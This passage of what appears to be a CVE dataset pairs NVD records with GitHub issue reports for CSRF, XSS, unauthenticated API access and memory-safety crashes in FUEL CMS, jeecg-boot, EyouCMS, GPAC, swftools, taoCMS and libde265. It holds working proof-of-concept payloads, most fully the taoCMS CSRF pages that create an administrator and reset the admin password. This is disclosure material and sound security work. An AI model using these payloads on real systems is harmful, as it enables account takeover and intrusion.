"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/daylightstudio/FUEL-CMS/issues/579 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a Permission via a post ID to /permissions/delete/2

POC:

The page:

| FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/579/comments | 0 | 2021-07-02T02:35:59Z | 2021-07-03T01:33:05Z | https://github.com/daylightstudio/FUEL-CMS/issues/579 | 935,357,769 | 579 |
CVE-2021-37304 | 2023-02-03T18:15:11.770 | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2793"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jeecgboot/jeecg-boot/issues/2793 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
2.4.5

##### 问题描述:
Unauthorized access to the httptrace interface reveals sensitive information such as user cookies
##### 截图&代码:
api interface
http://Ip:8080/jeecg-boot/actuator/httptrace/
This interface does not require any login permissions
local demo

Many jeecg-boot frameworks have such vulnerabilities, such as

The leaked information includes client IP, browser useragent, cookie, token, etc.
友情提示: 未按格式要求发帖,会直接删掉。
| [security issue] The jeecg-boot version is less than or equal to 2.4.5 httptrace interface has unauthorized access and leaks sensitive information such as user cookies | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2793/comments | 1 | 2021-07-15T08:12:15Z | 2021-07-15T10:06:18Z | https://github.com/jeecgboot/JeecgBoot/issues/2793 | 945,118,917 | 2,793 |
CVE-2021-37305 | 2023-02-03T18:15:11.890 | An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2794"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jeecgboot/jeecg-boot/issues/2794 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
<=2.4.5
##### 问题描述:
###### 1. leaks sensitive information api uri: /sys/user/querySysUser?username=admin

leaks sensitive information such as phone .etc
###### 2. Enumerate usernames api uri:/sys/user/checkOnlyUser?username=admin


Through enumeration, it is found that there are 2 accounts admin and user1 in the system
##### 截图&代码:
version:2.4.5




友情提示: 未按格式要求发帖,会直接删掉。
| [2 secueiry issue]jeecg-boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2794/comments | 1 | 2021-07-15T08:32:21Z | 2021-08-05T07:02:44Z | https://github.com/jeecgboot/JeecgBoot/issues/2794 | 945,135,797 | 2,794 |
CVE-2022-45755 | 2023-02-08T19:15:11.600 | Cross-site scripting (XSS) vulnerability in EyouCMS v1.6.0 allows attackers to execute arbitrary code via the home page description on the basic information page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/39"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EB987CAE-6D4D-417A-8E0D-9DCC47F986EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/39 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | Version:V1.6.0-UTF8-SP1

1. Go to the background --> basic information--> home page description

Construct the JS script at the home page description and submit it.Payload:"><script>alert("XSS");</script>
2. Open the EyouCMS client

| Vulnerability: EyouCMS v1.6.0 has a vulnerability that stores cross-site scripting (XSS) | https://api.github.com/repos/weng-xianhu/eyoucms/issues/39/comments | 1 | 2022-11-19T06:37:02Z | 2023-02-20T08:21:46Z | https://github.com/weng-xianhu/eyoucms/issues/39 | 1,456,264,360 | 39 |
CVE-2023-0841 | 2023-02-15T14:15:13.283 | A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221087. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/advisories/GHSA-w52x-cp47-xhhw"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/gpac/gpac/commit/851560e3dc8155d45ace4b0d77421f241ed71dc4"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/gpac/gpac/issues/2396"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/gpac/gpac/releases/tag/v2.2.1"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/qianshuidewajueji/poc/blob/main/gpac/mp3_dmx_process_poc3"
},
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221087"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221087"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev40-g3602a5ded:*:*:*:*:*:*:*",
"matchCriteriaId": "BF8AB1FE-492D-4281-B779-FD501A50998C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2396 | null | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Version
```
MP4Box - GPAC version 2.3-DEV-rev40-g3602a5ded-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer --verbose
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
complie and run
```
./configure --enable-sanitizer --enable-debug
make
./MP4Box -info mp3_dmx_process_poc2
```
information reported by sanitizer
```
[MP3Dmx] invalid frame, resyncing
=================================================================
==29937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000e322 at pc 0x7fe02eb39490 bp 0x7ffdcd4a3c40 sp 0x7ffdcd4a33e8
READ of size 316 at 0x61a00000e322 thread T0
#0 0x7fe02eb3948f in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790
#1 0x7fe02c490c9f in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x7fe02c490c9f in mp3_dmx_process filters/reframe_mp3.c:677
#3 0x7fe02c0700ed in gf_filter_process_task filter_core/filter.c:2828
#4 0x7fe02c032082 in gf_fs_thread_proc filter_core/filter_session.c:1859
#5 0x7fe02c03e856 in gf_fs_run filter_core/filter_session.c:2120
#6 0x7fe02ba7c806 in gf_media_import media_tools/media_import.c:1228
#7 0x55576950e3b1 in convert_file_info /home/qianshuidewajueji/gpac/applications/mp4box/fileimport.c:130
#8 0x5557694dddb5 in mp4box_main /home/qianshuidewajueji/gpac/applications/mp4box/mp4box.c:6302
#9 0x7fe028d14082 in __libc_start_main ../csu/libc-start.c:308
#10 0x5557694b1cfd in _start (/home/qianshuidewajueji/gpac/bin/gcc/MP4Box+0xa3cfd)
0x61a00000e322 is located 0 bytes to the right of 1186-byte region [0x61a00000de80,0x61a00000e322)
allocated by thread T0 here:
#0 0x7fe02ebabc3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163
#1 0x7fe02c492248 in mp3_dmx_process filters/reframe_mp3.c:547
#2 0x7fe02c0700ed in gf_filter_process_task filter_core/filter.c:2828
#3 0x7fe02c032082 in gf_fs_thread_proc filter_core/filter_session.c:1859
#4 0x7fe02c03e856 in gf_fs_run filter_core/filter_session.c:2120
#5 0x7fe02ba7c806 in gf_media_import media_tools/media_import.c:1228
#6 0x55576950e3b1 in convert_file_info /home/qianshuidewajueji/gpac/applications/mp4box/fileimport.c:130
#7 0x5557694dddb5 in mp4box_main /home/qianshuidewajueji/gpac/applications/mp4box/mp4box.c:6302
#8 0x7fe028d14082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 in __interceptor_memcpy
Shadow bytes around the buggy address:
0x0c347fff9c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c347fff9c60: 00 00 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==29937==ABORTING
```
# Poc
https://github.com/qianshuidewajueji/poc/blob/main/gpac/mp3_dmx_process_poc2
| heap-buffer-overflow in function mp3_dmx_process filters/reframe_mp3.c:677 | https://api.github.com/repos/gpac/gpac/issues/2396/comments | 1 | 2023-02-09T14:19:15Z | 2023-02-13T16:32:29Z | https://github.com/gpac/gpac/issues/2396 | 1,577,978,840 | 2,396 |
CVE-2022-46440 | 2023-02-24T02:15:10.377 | ttftool v0.9.2 was discovered to contain a segmentation violation via the readU16 function at ttf.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/keepinggg/poc"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/194"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/matthiaskramm/swftools/issues/194 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | # SEGV
## env
ubuntu20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)
ttftool - part of swftools 0.9.2
## sample
[poc.zip](https://github.com/matthiaskramm/swftools/files/10101243/poc.zip)
## crash
```
./ttftool poc1
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3017452==ERROR: AddressSanitizer: SEGV on unknown address 0x615ff2000080 (pc 0x556969fea2d4 bp 0x000000000024 sp 0x7fffe586ef40 T0)
==3017452==The signal is caused by a READ memory access.
#0 0x556969fea2d3 in readU16 /home/ther/fuzzing101/swftools-master/lib/ttf.c:88
#1 0x556969fea2d3 in readS16 /home/ther/fuzzing101/swftools-master/lib/ttf.c:95
#2 0x556969ffeca1 in glyf_parse /home/ther/fuzzing101/swftools-master/lib/ttf.c:1047
#3 0x556969ffeca1 in ttf_parse_tables /home/ther/fuzzing101/swftools-master/lib/ttf.c:1892
#4 0x556969ffeca1 in ttf_load /home/ther/fuzzing101/swftools-master/lib/ttf.c:2180
#5 0x55696a00f6b7 in ttf_open /home/ther/fuzzing101/swftools-master/lib/ttf.c:2435
#6 0x556969fea0d5 in main /home/ther/fuzzing101/swftools-master/src/ttftool.c:91
#7 0x7ff3f1649082 in __libc_start_main ../csu/libc-start.c:308
#8 0x556969fe988d in _start (/home/ther/fuzzing/swftools-master/src/ttftool+0x688d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ther/fuzzing101/swftools-master/lib/ttf.c:88 in readU16
==3017452==ABORTING
```
| The function readU16 in ttf.c appears SEGV | https://api.github.com/repos/swftools/swftools/issues/194/comments | 0 | 2022-11-28T07:04:36Z | 2022-11-28T07:04:36Z | https://github.com/swftools/swftools/issues/194 | 1,465,918,774 | 194 |
CVE-2021-34167 | 2023-02-24T21:15:10.627 | Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/taogogo/taocms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | After the administrator logged in, when he opened following malicious pages, CSRF(Cross Site Request Forgery) vulnerabilities occurred.
**poc:**
**one.html—add a new account which has administrator privileges**
```html
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='name' value='test' />";
fields += "<input type='hidden' name='passwd' value='test' />";
fields += "<input type='hidden' name='auth_level' value='admin' />";
fields += "<input type='hidden' name='auth_cat' value='' />";
fields += "<input type='hidden' name='status' value='1' />";
fields += "<input type='hidden' name='action' value='admin' />";
fields += "<input type='hidden' name='id' value='' />";
fields += "<input type='hidden' name='ctrl' value='save' />";
fields += "<input type='hidden' name='Submit' value='浜¤' />";
var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```

After finish this CSRF attack, we can see that a new account has been added.

**two.html—change current administrator’s password**
```html
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='pwd' value='admin123' />";
fields += "<input type='hidden' name='action' value='user' />";
fields += "<input type='hidden' name='ctrl' value='update' />";
fields += "<input type='hidden' name='Submit' value='¿®”¹!' />";
var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```
After that, the administrator’s will change from ‘admin’ to ‘admin123’.
**Solution:**
Better add a CSRF token or CAPTCHA for each important request.
| There are two CSRF vulnerabilities that can add administrator account and change administrator password | https://api.github.com/repos/taogogo/taocms/issues/6/comments | 1 | 2021-05-30T17:59:11Z | 2021-07-29T13:55:44Z | https://github.com/taogogo/taocms/issues/6 | 906,833,744 | 6 |
CVE-2023-24751 | 2023-03-01T15:15:11.393 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the mc_chroma function at motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/379"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/379 | [
"Exploit",
"Patch",
"Vendor Advisory"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function mc_chroma at motion.cc:244
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv03.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==7799==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55b3b6a88832 bp 0x7ffcc9fb8d30 sp 0x7ffcc9fb5180 T0)
==7799==The signal is caused by a READ memory access.
==7799==Hint: address points to the zero page.
#0 0x55b3b6a88831 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:244
#1 0x55b3b6a80067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
#2 0x55b3b6a80edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
#3 0x55b3b6968fb7 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#4 0x55b3b6971418 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4504
#5 0x55b3b69752e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#6 0x55b3b69773db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#7 0x55b3b697a0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#8 0x55b3b6883487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#9 0x55b3b6886ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#10 0x55b3b6887934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#11 0x55b3b688d902 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1338
#12 0x55b3b6852f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
#13 0x7f184b1ce082 in __libc_start_main ../csu/libc-start.c:308
#14 0x55b3b68570dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/motion.cc:244 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)
==7799==ABORTING
```
# POC
[poc_segv03.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv03.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv03.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
